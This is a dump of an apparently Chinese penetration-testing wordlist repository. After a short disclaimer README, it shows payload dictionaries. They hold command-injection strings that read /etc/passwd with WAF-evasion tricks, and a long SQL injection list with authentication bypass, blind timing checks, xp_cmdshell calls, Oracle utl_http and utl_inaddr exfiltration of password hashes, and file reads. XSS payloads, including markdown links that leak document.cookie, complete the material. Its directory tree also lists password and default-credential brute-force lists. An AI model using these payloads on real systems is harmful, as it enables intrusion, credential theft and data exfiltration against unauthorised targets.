Repository: HoAd-sc/R-dict Branch: main Commit: 5c2f01ae4856 Files: 67 Total size: 128.1 MB Directory structure: gitextract_aul4dxye/ ├── README.md ├── payload字典/ │ ├── rce命令执行的相关字典/ │ │ ├── Unix的rce_payload.txt │ │ ├── Windows的rce_payload.txt │ │ └── 过waf的一些rce_payload.txt │ ├── sql注入相关字典/ │ │ └── sql注入的字典.txt │ ├── xss跨站脚本相关字典/ │ │ ├── 30字符以下的xss-payload.txt │ │ ├── markdown处使用的xss-payload.txt │ │ ├── xss.md │ │ ├── 一些bypass的xss-payload.md │ │ └── 一些探测用的payload.txt │ ├── 文件上传相关字典/ │ │ ├── 一次测试所有后缀.txt │ │ └── 文件上传后缀名字典.txt │ ├── 测试用的邮箱字典/ │ │ └── 邮箱字典.txt │ ├── 系统文件路径字典/ │ │ └── linux常见路径.txt │ └── 跟请求有关的一些字典/ │ ├── MimeType字典.txt │ ├── User-Agent字典.txt │ ├── UserAgent字典多.txt │ └── 请求头的字典.txt ├── 参数字典/ │ ├── fuzz参数的字典1.txt │ ├── fuzz参数的字典2.txt │ ├── fuzz参数的字典3.txt │ ├── fuzz参数的字典4.txt │ └── js文件.txt ├── 子域名字典/ │ ├── 110w子域名.txt │ └── 18w自己常用.txt ├── 用户名和密码/ │ ├── 密码/ │ │ ├── 15w密码字典.txt │ │ ├── password3000.txt │ │ ├── password500.txt │ │ ├── 四个条件至少满足三个的8位数密码91286条.txt │ │ ├── 安全设备的密码/ │ │ │ ├── 华为安全产品默认用户名密码速查表.xlsx │ │ │ ├── 国内防火墙默认密码.txt │ │ │ ├── 常见安全设备默认口令清单.xlsx │ │ │ └── 路由器默认密码.txt │ │ ├── 常见的应用弱口令/ │ │ │ ├── axis.txt │ │ │ ├── grafana.txt │ │ │ ├── minio.txt │ │ │ ├── nacos.txt │ │ │ ├── rabbitmq.txt │ │ │ ├── weblogic.txt │ │ │ ├── zabbix.txt │ │ │ ├── 若依.txt │ │ │ └── 路由器默认密码.txt │ │ ├── 某集团下发的弱口令字典.txt │ │ ├── 测试用的手机号.txt │ │ └── 自己常用的密码字典.txt │ └── 账号/ │ ├── 1200个中文名.txt │ ├── ChinaUser全称.txt │ ├── ChinaUser简写.txt │ ├── user500.txt │ ├── user9000.txt │ └── 爆破oa的账号.txt └── 目录文件字典/ ├── api-pl-xml/ │ ├── 120w的xml文件字典.txt │ ├── 22w的pl后缀文件.txt │ └── 30w的api接口字典.txt ├── asp-aspx/ │ ├── 13w的asp字典.txt │ └── 6w的aspx字典.txt ├── bak-js/ │ ├── 110w的js字典.txt │ ├── 150个js测试字典.txt │ └── 3w的bak字典.txt ├── do-jsp-action/ │ ├── 5w的jsp字典.txt │ └── do+jsp+action后缀.txt ├── php+html/ │ ├── 10w的html字典.txt │ └── 17w的php字典.txt ├── sping swaggerapi/ │ ├── spring常用.txt │ └── swagger-api.txt ├── 目录/ │ └── 目录.txt └── 自己常用的一个文件扫所有.txt ================================================ FILE CONTENTS ================================================ ================================================ FILE: README.md ================================================ #R-dict 渗透测试 挖掘SRC 红队 黑盒测试使用 ``` 免责声明 本项目仅面向合法授权的行为,如您需要测试本项目的可用性,请自行搭建靶机环境。 为避免被恶意使用,不会对目标发起真实攻击。 在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。 ``` ================================================ FILE: payload字典/rce命令执行的相关字典/Unix的rce_payload.txt ================================================ id ,id ;id ;id; 'id' "id" ''id ''id'' ''id''& *id *id* **id** (id) `id` `id`& `id` & ;id| ;|id| |id |id| ||id ||id| ||id; |id; &id &id& &&id &&id&& ^id php -r 'var_dump(exec("id"));' <!--#exec%20cmd="id;--> /bin$u/bash$u cat$u+/etc$u/passwd$u ";cat+/etc/passwd+# ;+$u+cat+/etc$u/passwd$u ;+$u+cat+/etc$u/passwd+\# /???/??t+/???/??ss?? /?in/cat+/et?/passw? ;+cat+/e'tc/pass'wd c\\a\\t+/et\\c/pas\\swd cat /etc$u/passwd (sy.(st).em)(whoami); ;cat+/etc/passwd ;cat+/etc/passwd+# ;cat$u+/etc$u/passwd$u ;cat%20/etc/passwd ;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd ;cat$u /etc$u/passwd$u ;{cat,/etc/passwd} ;cat /index.html|id| ;id; ;id ;netstat -a; |id |/usr/bin/id |id| ||/usr/bin/id| |id; ||/usr/bin/id; ;id| ;|/usr/bin/id| \n/bin/ls -al\n \n/usr/bin/id\n \nid\n \n/usr/bin/id; \nid; \n/usr/bin/id| \nid| ;/usr/bin/id\n ;id\n |usr/bin/id\n |nid\n `id` a);id a;id a);id; a;id; a);id| a;id| a)|id a|id a)|id; |/bin/ls -al a);/usr/bin/id a;/usr/bin/id a);/usr/bin/id; a;/usr/bin/id; a);/usr/bin/id| a;/usr/bin/id| a)|/usr/bin/id a|/usr/bin/id a)|/usr/bin/id; ;system('/usr/bin/id') %0Acat%20/etc/passwd %0A/usr/bin/id %0Aid %0A/usr/bin/id%0A %0Aid%0A & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & %0a ping -i 30 127.0.0.1 %0a `ping 127.0.0.1` | id & id ; id %0a id %0a $;/usr/bin/id +|+Dir+c:\ $+|+Dir+c:\ %26%26+|+dir c:\ $%26%26dir c:\ %0a+dir+c:\ +|+Dir+c:%255c $+|+Dir+c:%255c %26%26+|+dir c:%255c $%26%26dir+c:%255c %0a+dir+c:%255c +|+Dir+c:%2f $+|+Dir+c:%2f %26%26+|+dir c:%2f $%26%26dir+c:%2f %0a+dir+c:%2f +dir+c:\+| +|+dir+c:\+| +|+dir+c:%2f+| dir+c:\ ||+dir|c:\ ================================================ FILE: payload字典/sql注入相关字典/sql注入的字典.txt ================================================ "or "a"="a ')or('a'='a or 1=1-- 'or 1=1-- a'or' 1=1-- "or 1=1-- 'or'a'='a "or"="a'='a 'or''=' 'or'='or' 1 or '1'='1'=1 1 or '1'='1' or 1=1 'OR 1=1 "or 1=1 'xor 'or 1=1/* 1'or'1'='1 ' a' or 1=1-- "a"" or 1=1--" or a = a a' or 'a' = 'a 1 or 1=1 a' waitfor delay '0:0:10'-- 1 waitfor delay '0:0:10'-- declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) a' ? ' or 1=1 ý or 1=1 -- x' AND userid IS NULL; -- x' AND email IS NULL; -- anything' OR 'x'='x x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND members.email IS NULL; -- x' OR full_name LIKE '%Bob% 23 OR 1=1 '; exec master..xp_cmdshell 'ping 172.10.1.255'-- '%20or%20''=' '%20or%20'x'='x %20or%20x=x ')%20or%20('x'='x 0 or 1=1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # or 0=0 #" or 0=0 # ' or 1=1-- " or 1=1-- ' or '1'='1'-- ' or 1 --' or%201=1 or%201=1 -- ' or 1=1 or ''=' or 1=1 or ""= ' or a=a-- or a=a ') or ('a'='a ) or (a=a hi or a=a hi or 1=1 --" hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a "hi"") or (""a""=""a" 'hi' or 'x'='x'; @variable ,@variable PRINT PRINT @@variable ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- --sp_password \x27UNION SELECT ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* to_timestamp_tz tz_offset <>"'%;)(&+ '%20or%201=1 %27%20or%201=1 %20$(sleep%2050) %20'sleep%2050' char%4039%41%2b%40SELECT '%20OR 'sqlattempt1 (sqlattempt2) | %7C *| %2A%7C *(|(mail=*)) %2A%28%7C%28mail%3D%2A%29%29 *(|(objectclass=*)) %2A%28%7C%28objectclass%3D%2A%29%29 ( %28 ) %29 & %26 ! %21 ' or ''=' x' or 1=1 or 'x'='y / // //* */* a' or 3=3-- "a"" or 3=3--" ' or 3=3 ý or 3=3 -- " # - -- ' -- --'; ' ; = ' = ; = -- \x23 \x27 \x3D \x3B' \x3D \x27 \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * 'or select * admin'-- ' or 'x'='x " or "x"="x ') or ('x'='x " or 0=0 # "' or 1 --'" " or 1=1 or ""=" " or "a"="a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi") or ("a"="a <>"'%;)(&+ ' and '' like ' ' AnD '' like ' ' or '' like ' ' and '' like '% ' aND '' like '% ' and '' like ''-- ' and 2>1-- ' and 2>3-- ') and ('x'='x ) and (1=1 ¡® or 1=1 -- ¡® or 3=3 -- sleep(__TIME__)# 1 or sleep(__TIME__)# " or sleep(__TIME__)# ' or sleep(__TIME__)# " or sleep(__TIME__)=" ' or sleep(__TIME__)=' 1) or sleep(__TIME__)# ") or sleep(__TIME__)=" ') or sleep(__TIME__)=' 1)) or sleep(__TIME__)# ")) or sleep(__TIME__)=" ')) or sleep(__TIME__)=' ;waitfor delay '0:0:__TIME__'-- );waitfor delay '0:0:__TIME__'-- ';waitfor delay '0:0:__TIME__'-- ";waitfor delay '0:0:__TIME__'-- ');waitfor delay '0:0:__TIME__'-- ");waitfor delay '0:0:__TIME__'-- ));waitfor delay '0:0:__TIME__'-- '));waitfor delay '0:0:__TIME__'-- "));waitfor delay '0:0:__TIME__'-- benchmark(10000000,MD5(1))# 1 or benchmark(10000000,MD5(1))# " or benchmark(10000000,MD5(1))# ' or benchmark(10000000,MD5(1))# 1) or benchmark(10000000,MD5(1))# ") or benchmark(10000000,MD5(1))# ') or benchmark(10000000,MD5(1))# 1)) or benchmark(10000000,MD5(1))# ")) or benchmark(10000000,MD5(1))# ')) or benchmark(10000000,MD5(1))# ; -- '; -- '); -- '; exec master..xp_cmdshell 'ping 10.10.1.2'-- ' grant connect to name; grant resource to name; -- ' or 1=1 -- ' union (select @@version) -- ' union (select NULL, (select @@version)) -- ' union (select NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- 1'1 1 exec sp_ (or exec xp_) 1 and 1=1 1' and 1=(select count(*) from tablenames); -- 1' or '1'='1 1or1=1 fake@ema'or'il.nl'='il.nl 1 1 and user_name() = 'dbo' \'; desc users; -- 1\'1 1' and non_existant_table = '1 ' or username is not NULL or username = ' 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 1 uni/**/on select all from where ’ or ‘1’=’1 ' or '1'='1 '||utl_http.request('httP://192.168.1.1/')||' ' || myappadmin.adduser('admin', 'newpass') || ' ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i 0 031003000270000 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; ||6 '||'6 (||6) admin' or ' ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); ' and 1 in (select var from temp)-- as asc '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > bfilename declare @q nvarchar (4000) select @q = declare @s varchar(22) select @s = declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e delete desc distinct '||(elt(-3+5,bin(15),ord(10),hex(char(45)))) exec(@s) '; exec ('sel' + 'ect us' + 'er') exec sp '; execute immediate 'sel' || 'ect us' || 'er' exec xp ' group by userid having 1=1-- handler having ' having 1=1-- insert like limit or ' or 1/* ; or '1'='1' ' or 1=1 /* '/**/or/**/1/**/=/**/1 ‘ or 1=1 -- or 1=1 ' or 1 in (select @@version)-- ' or 2 > 1 ' or 2 between 1 and 3 ‘ or 3=3 -- ' or '7659'='7659 ' or 'a'='a order by or isNULL(1/0) /* " or isNULL(1/0) /* ' or 'something' like 'some%' ' or 'something' = 'some'+'thing' ' or 'text' = n'text' ' or 'text' > 't' ' or 'unusual' = 'unusual' ' or username like char(37); ' or 'whatever' in ('whatever') ' -- &password= password:*/=1-- procedure replace select ' select * from information_schema.tables-- ' select name from syscolumns where id = (select id from sysobjects where name = tablename')-- 'sqlvuln '+sqlvuln (sqlvuln) sqlvuln; truncate ' union all select @@version-- ' union select uni/**/on sel/**/ect ' union select 1,load_file('/etc/passwd'),1,1,1; ) union select * from information_schema.tables; ' union select * from users where login = char(114,111,111,116); update @var select @var as var into temp end -- ================================================ FILE: payload字典/xss跨站脚本相关字典/30字符以下的xss-payload.txt ================================================ onmouseover=¡¯alert(9)¡¯ >"'> "+alert(16)+" copy this! '> ='> ">
alert(712))//";alert(712))//-- \";alert(735);//
¼script¾alert(754)¼/script¾ javascript:alert(853) \\";alert(878);// <BODY ONLOAD=alert(882)> žscriptualert(889)ž/scriptu d=\"alert(909);\\")\"; \";alert(943);// ¼script¾alert(945)¼/script¾ “> foo ‘; alert(983); var foo=’ foo\’; alert(984);//’; "> \";alert(1015);//
¼script¾alert(1034)¼/script¾
¼script¾alert(1668)¼/script¾ alert(1720)) " onfocus=alert(1751) "> <"
'); alert(1788); var x=' \\'); alert(1789);var x=\' \";alert(1844);// "> <;BODY ONLOAD=alert(1879)>; \";;alert(1913);// "> ================================================ FILE: payload字典/xss跨站脚本相关字典/markdown处使用的xss-payload.txt ================================================ [a](javascript:prompt(document.cookie)) [a](j a v a s c r i p t:prompt(document.cookie)) ![a](javascript:prompt(document.cookie))\ <javascript:alert('XSS')> ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\ [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [a](javascript:alert('XSS')) ![a'"`onerror=prompt(document.cookie)](x)\ [citelol]: (javascript:prompt(document.cookie)) [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) [test](javascript://%0d%0aprompt(1)) [test](javascript://%0d%0aprompt(1);com) [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) [notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [clickme](vbscript:alert(document.domain)) _http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAABACAMAAADlCI9NAAACcFBMVEX/AAD//////f3//v7/0tL/AQH/cHD/Cwv/+/v/CQn/EBD/FRX/+Pj/ISH/PDz/6Oj/CAj/FBT/DAz/Bgb/rq7/p6f/gID/mpr/oaH/NTX/5+f/mZn/wcH/ICD/ERH/Skr/3Nz/AgL/trb/QED/z8//6+v/BAT/i4v/9fX/ZWX/x8f/aGj/ysr/8/P/UlL/8vL/T0//dXX/hIT/eXn/bGz/iIj/XV3/jo7/W1v/wMD/Hh7/+vr/t7f/1dX/HBz/zc3/nJz/4eH/Zmb/Hx//RET/Njb/jIz/f3//Ojr/w8P/Ghr/8PD/Jyf/mJj/AwP/srL/Cgr/1NT/5ub/PT3/fHz/Dw//eHj/ra3/IiL/DQ3//Pz/9/f/Ly//+fn/UFD/MTH/vb3/7Oz/pKT/1tb/2tr/jY3/6en/QkL/5OT/ubn/JSX/MjL/Kyv/Fxf/Rkb/sbH/39//iYn/q6v/qqr/Y2P/Li7/wsL/uLj/4+P/yMj/S0v/GRn/cnL/hob/l5f/s7P/Tk7/WVn/ior/09P/hYX/bW3/GBj/XFz/aWn/Q0P/vLz/KCj/kZH/5eX/U1P/Wlr/cXH/7+//Kir/r6//LS3/vr7/lpb/lZX/WFj/ODj/a2v/TU3/urr/tbX/np7/BQX/SUn/Bwf/4uL/d3f/ExP/y8v/NDT/KSn/goL/8fH/qan/paX/2Nj/HR3/4OD/VFT/Z2f/SEj/bm7/v7//RUX/Fhb/ycn/V1f/m5v/IyP/xMT/rKz/oKD/7e3/dHT/h4f/Pj7/b2//fn7/oqL/7u7/2dn/TEz/Gxv/6ur/3d3/Nzf/k5P/EhL/Dg7/o6P/UVHe/LWIAAADf0lEQVR4Xu3UY7MraRRH8b26g2Pbtn1t27Zt37Ft27Zt6yvNpPqpPp3GneSeqZo3z3r5T1XXL6nOFnc6nU6n0+l046tPruw/+Vil/C8tvfscquuuOGTPT2ZnRySwWaFQqGG8Y6j6Zzgggd0XChWLf/U1OFoQaVJ7AayUwPYALHEM6UCWBDYJbhXfHjUBOHvVqz8YABxfnDCArrED7jSAs13Px4Zo1jmA7eGEAXvXjRVQuQE4USWqp5pNoCthALePFfAQ0OcchoCGBAEPgPGiE7AiacChDfBmjjg7DVztAKRtnJsXALj/Hpiy2B9wofqW9AQAg8Bd8VOpCR02YMVEE4xli/L8AOmtQMQHsP9IGUBZedq/AWJfIez+x4KZqgDtBlbzon6A8GnonOwBXNONavlmUS2Dx8XTjcCwe1wNvGQB2gxaKhbV7Ubx3QC5bRMUuAEvA9kFzzW3TQAeVoB5cFw8zQUGPH9M4LwFgML5IpL6BHCvH0DmAD3xgIUpUJcTmy7UQHaV/bteKZ6GgGr3eAq4QQEmWlNqJ1z0BeTvgGfz4gAFsDXfUmbeAeoAF0OfuLL8C91jHnCtBchYq7YzsMsXIFkmDDsBjwBfi2o6GM9IrOshIp5mA6vc42Sg1wJMEVUJlPgDpBzWb3EAVsMOm5m7Hg5KrAjcJJ5uRn3uLAvosgBrRPUgnAgApC2HjtpRwFTneZRpqLs6Ak+Lp5lAj9+LccoCzLYPZjBA3gIGRgHj4EuxewH6JdZhKBVPM4CL7rEIiKo7kMAvILIEXplvA/bCR2JXAYMSawtkiqfaDHjNtYVfhzJJBvBGJ3zmADhv6054W71ZrBNvHZDigr0DDCcFkHeB8wog70G/2LXA+xIrh03i02Zgavx0Blo+SA5Q+yEcrVSAYvjYBhwEPrEoDZ+KX20wIe7G1ZtwTJIDyMYU+FwBeuGLpaLqg91NcqnqgQU9Yre/ETpzkwXIIKAAmRnQruboUeiVS1cHmF8pcv70bqBVkgak1tgAaYbuw9bj9kFjVN28wsJvxK9VFQDGzjVF7d9+9z1ARJIHyMxRQNo2SDn2408HBsY5njZJPcFbTomJo59H5HIAUmIDpPQXVGS0igfg7detBqptv/0ulwfIbbQB8kchVtNmiQsQUO7Qru37jpQX7WmS/6YZPXP+LPprbVgC0ul0Op1Op9Pp/gYrAa7fWhG7QQAAAABJRU5ErkJggg==);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// > [text](http://danlec.com " [@danlec](/danlec) ") [a](javascript:this;alert(1)) [a](javascript:this;alert(1)) [a](javascript:this;alert(1)) [a](Javascript:alert(1)) [a](Javas%26%2399;ript:alert(1)) [a](javascript:alert￾(1)) [a](javascript:confirm(1) [a](javascript://www.google.com%0Aprompt(1)) 